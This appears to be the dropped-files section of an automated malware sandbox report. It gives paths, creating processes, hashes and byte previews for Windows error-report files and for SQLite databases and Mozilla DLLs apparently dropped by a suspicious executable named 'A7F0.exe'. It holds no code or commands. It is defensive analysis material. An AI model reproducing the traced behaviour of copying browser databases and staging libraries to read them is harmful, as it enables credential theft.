                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                    Entropy (8bit):0.2485928694932566
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU45:BJiRdwfu2SRU45
                                                                                                                                                    MD5:46301C913F59052C24F89BB61C076A86
                                                                                                                                                    SHA1:280D65E7DD5758F8E3A6C48C41E32B6D0AA4C53F
                                                                                                                                                    SHA-256:8A752E2055C6F60317E892892F41DF560209FE83C82A8EBE85AD5A82FB3F15B7
                                                                                                                                                    SHA-512:2DEA2312E30258ABD94606A4BBB1C5CBF0819C4CF4AA2AE98225AFD924E64406923D915ECED6F62BDD08499A1F8EA479432EE8D0FA243F2ECF9162E658910DB3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:Extensible storage user DataBase, version 0x620, checksum 0x2d162e1b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):786432
                                                                                                                                                    Entropy (8bit):0.2506815554351528
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:lbW+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:lbZSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                    MD5:5E8CDCD58254AD3AA7C14A73154B3277
                                                                                                                                                    SHA1:9E9C44202300E3B618537D4D692360D57052A478
                                                                                                                                                    SHA-256:6D19EF4AD21115659FEB89AB15A4CC3C26E5DBE468A568B2908A2B95AB552345
                                                                                                                                                    SHA-512:6B45638E58215FDBF208547170B3DE276BCA26C78415874AAAEA5BEA56507B18529515AD47D36A876B12149FFC9BD5F9154A671BAD5A4C252C1B15DC29703B74
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: -...... ................e.f.3...w........................&..........w...,...z..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................S.3.,...z.q................8.`..,...z..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.07555221228914681
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:sX1EvyJAq+l/bJdAtiXn6kqyll3Vkttlmlnl:sAyuq+t4Lkq23
                                                                                                                                                    MD5:C7CCFBC9E369C73F4A1268BEC8B124FA
                                                                                                                                                    SHA1:F665B2B40E0561EE864D90A3D4F80E86324B5D6A
                                                                                                                                                    SHA-256:64230019D1737CAFA29C4DF8DFCF1EFB8FE98851FEBEE83F490EF18F9E5FAF2D
                                                                                                                                                    SHA-512:EF37F0AB3ABD2CF8DF0F66F4FDE4C0F729044CDD7E0829F0BA42FCD409365A7CE6F17A77CB5F90AFD33F70C612EA82D3DD7374D0E5603F5F766D07D487110B2A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: ...R.....................................3...w...,...z.......w...............w.......w....:O.....w..................8.`..,...z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1E7F.exe_56ef6c3f939a5c31c54ae423594576eccb36d7e_39743ca4_173f7c90\Report.wer
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):65536
                                                                                                                                                    Entropy (8bit):0.8147334084221176
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:j+F+XLkopwOQoJ7R3V6tpXIQcQec6tycEfcw3m+HbHg/8BRTf3o8Fa9iVfOyWYmp:qckoJ8HQ0lbjIq/u7srS274ItvS
                                                                                                                                                    MD5:0649ECAD777C02E54262EF3EB90CCED8
                                                                                                                                                    SHA1:5E75E6699F03B849535D31A1A09A0F3497C86D7B
                                                                                                                                                    SHA-256:85BA251E129D34788335425E83C40F0B5008954FAFF5A28F0E4CEA178D0737BF
                                                                                                                                                    SHA-512:79B833B2EFB512A790883AF7B7F5DEEC4029A1D3FDBD099FC6FD8E4E51D3584DA139E4633BA69FEFCFA8076C88AE31177E06AF9B5F3D4360772BFF716705CD6F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.5.9.4.4.1.4.4.7.7.0.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.5.9.4.5.0.5.8.8.2.7.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.d.b.a.8.7.6.a.-.b.e.b.4.-.4.f.0.c.-.b.3.f.0.-.b.a.1.e.3.9.a.c.0.0.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.a.2.c.d.2.1.-.2.4.f.3.-.4.b.b.a.-.8.f.6.c.-.2.9.5.2.1.f.e.9.2.d.0.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.E.7.F...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.0.-.0.0.0.1.-.0.0.1.7.-.6.8.0.9.-.2.5.a.b.7.6.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.b.8.a.6.9.7.9.3.a.e.a.f.d.6.b.7.1.9.f.f.0.5.f.0.c.b.d.a.b.c.6.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.1.E.7.F...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E1E.tmp.dmp
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 18:44:02 2022, 0x1205a4 type
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):42152
                                                                                                                                                    Entropy (8bit):2.0070556637522814
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:9+01WMNuYFYdOeh0k1ZU/z3gtgcoegRtT2t9sL2ChH1X:pNh6QefOjwzAx1X
                                                                                                                                                    MD5:316DB5CFD39AB644814F89500F3C9906
                                                                                                                                                    SHA1:66A84F4A0D70C0DB0D93DC88D01CB7DB183612F7
                                                                                                                                                    SHA-256:B89B7C2A0A6ECF23AFA9F25E045FF95F078F13F8581664FB63FAB4ABB2F1FCA6
                                                                                                                                                    SHA-512:5D786B587A11E11BFD7D4538D0C815664BF8136E06C9F411C9F563CB31EDED963757FBDCFD54A003C6CC8DCA2C5EBE964207AD6788D2C2E2ABC8213B909F5296
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MDMP....... .......r..a....................................4...v(..........T.......8...........T...........................x...........d....................................................................U...........B..............GenuineIntelW...........T.......P...d..a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER5581.tmp.WERInternalMetadata.xml
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):8390
                                                                                                                                                    Entropy (8bit):3.702157392275921
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:Rrl7r3GLNire6F6YJfSUjgmfqRSUCpDi89b23sfdym:RrlsNiC6F6YhSUjgmfqRSf28fZ
                                                                                                                                                    MD5:68B45BFA81BD5DDCCE22105ACE357023
                                                                                                                                                    SHA1:F8518BF4AC336C8189438B8FF8DFACAD2867A272
                                                                                                                                                    SHA-256:7A3BDCE83450471DAADB0BE59262D65E518AC8B3A31C6289846522CCBBB0C300
                                                                                                                                                    SHA-512:30C650628A38511C711E5DA5C1979A31325B52F6E478AFE0D574874561A63DC7C217615B62255B7D00A55D38227A24468164D0113BC04D02E55BE825E264E21A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.0.<./.P.i.d.>.......
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER59A9.tmp.xml
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4685
                                                                                                                                                    Entropy (8bit):4.480309088097584
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:cvIwSD8zskJgtWI9oaEYWSC8BQ8fm8M4JN8qFthlco+q8v981juLiAd:uITfifaERSNnJfnKAuLiAd
                                                                                                                                                    MD5:FF921EB2F3095E2BB781CB4894F054C4
                                                                                                                                                    SHA1:53BB32657077BCC58DBA8B5554DE9558041C2110
                                                                                                                                                    SHA-256:DD601D81852C59F193A8E0FD702813BD11727BB49E38C1DE94CF94BF80C4BA56
                                                                                                                                                    SHA-512:DB05E9D5B1E65C9FD7CDA725F54F48AD57B35799325CEE9BA8DC852256AC2C802AA2C853EF0E7E327DBC414F8C3FDDBFD2D52305532E3AD69AA62AC4EA343E5C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1342314" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER6219.tmp.csv
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):48344
                                                                                                                                                    Entropy (8bit):3.066109567350114
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:/fHX382gE2hsUrLYKARAkNkiUQIyzU9XMPvw0:/fHX382CsUrLYKARAskihNU9XMPvw0
                                                                                                                                                    MD5:54C5FA9810320E84420B5B29103D744D
                                                                                                                                                    SHA1:6CE46C334A0FCB0C036BCD6C987CA01674896471
                                                                                                                                                    SHA-256:07C0E122791672016203522FCF355B2D35C74777E35EB16B8C09A117A6010B28
                                                                                                                                                    SHA-512:3F50E4D84BE8DF612BBA7F15DBFB2658ACB83A20547A0BAB93D5F7476769E4008C320E994C297487AD49F896A2129E6F9F2759CE4C3CEDB4A12657FB6C163432
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER66CE.tmp.txt
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13340
                                                                                                                                                    Entropy (8bit):2.69536143503136
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:9GiZYWK5aBkdY1Y6W/5H6YEZ7FtBt8i0Tj0/w6UA1kaObMaz8IOq3:9jZDKxiVtZUmkaObMaz7Oq3
                                                                                                                                                    MD5:E5DAA55DFDF64E4FD828D86A427F34A8
                                                                                                                                                    SHA1:A1743376D125D03351D754B114121A79696341EC
                                                                                                                                                    SHA-256:DDFB1CDEA7F63C7808AA474F23F299F6CD0189E80695D0C0F7D0B87BE293C3A5
                                                                                                                                                    SHA-512:FBB6388AAE297315408093BC303D0A87ED52FBBE20F8911FEAA7DE77AD6ADC39CF65D28A534DB34DA4D4D3F70B0F60E3D4C03AF58E2C3D5D6A2206FF559A6550
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                    C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):73728
                                                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):73728
                                                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):40960
                                                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):0.6951152985249047
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBopIvJn2QOYiUG3PaVrX:T5LLOpEO5J/Kn7U1uBopIvZXC/alX
                                                                                                                                                    MD5:EA7F9615D77815B5FFF7C15179C6C560
                                                                                                                                                    SHA1:3D1D0BAC6633344E2B6592464EBB957D0D8DD48F
                                                                                                                                                    SHA-256:A5D1ABB57C516F4B3DF3D18950AD1319BA1A63F9A39785F8F0EACE0A482CAB17
                                                                                                                                                    SHA-512:9C818471F69758BD4884FDB9B543211C9E1EE832AC29C2C5A0377C412454E8C745FB3F38FF6E3853AE365D04933C0EC55A46DDA60580D244B308F92C57258C98
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):123344
                                                                                                                                                    Entropy (8bit):6.504957642040826
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
                                                                                                                                                    MD5:F92586E9CC1F12223B7EEB1A8CD4323C
                                                                                                                                                    SHA1:F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
                                                                                                                                                    SHA-256:A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
                                                                                                                                                    SHA-512:5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):26064
                                                                                                                                                    Entropy (8bit):5.981632010321345
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
                                                                                                                                                    MD5:A7FABF3DCE008915CEE4FFC338FA1CE6
                                                                                                                                                    SHA1:F411FB41181C79FBA0516D5674D07444E98E7C92
                                                                                                                                                    SHA-256:D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
                                                                                                                                                    SHA-512:3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):70608
                                                                                                                                                    Entropy (8bit):5.389701090881864
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
                                                                                                                                                    MD5:5243F66EF4595D9D8902069EED8777E2
                                                                                                                                                    SHA1:1FB7F82CD5F1376C5378CD88F853727AB1CC439E
                                                                                                                                                    SHA-256:621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
                                                                                                                                                    SHA-512:A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                    Reputation:unknown
